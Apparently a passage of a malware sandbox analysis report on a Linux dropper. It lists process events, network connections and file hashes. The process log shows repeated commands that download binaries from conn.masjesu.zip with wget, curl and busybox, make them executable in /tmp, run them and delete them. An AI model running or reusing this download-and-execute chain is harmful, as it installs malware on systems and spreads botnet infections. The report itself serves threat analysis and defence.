[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/rm
[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/chmod
[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj
[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/rm
[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/chmod
[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p
[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/rm
[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/chmod
[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf
[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/rm
[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/chmod
[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O
[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/rm
[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 8.8.8.8:53 | _http._tcp.security.ubuntu.com | udp |
| US | 8.8.8.8:53 | _http._tcp.se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | se.archive.ubuntu.com | udp |
| US | 91.189.91.81:80 | security.ubuntu.com | tcp |
| SE | 194.71.11.163:80 | se.archive.ubuntu.com | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.58:443 | api.snapcraft.io | tcp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.58:443 | api.snapcraft.io | tcp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 8.8.8.8:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 91.189.91.100:443 | canonical-bos01.cdn.snapcraftcontent.com | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 1.1.1.1:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 1.1.1.1:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 91.189.91.43:443 | canonical-bos01.cdn.snapcraftcontent.com | tcp |
| US | 1.1.1.1:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
Files
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |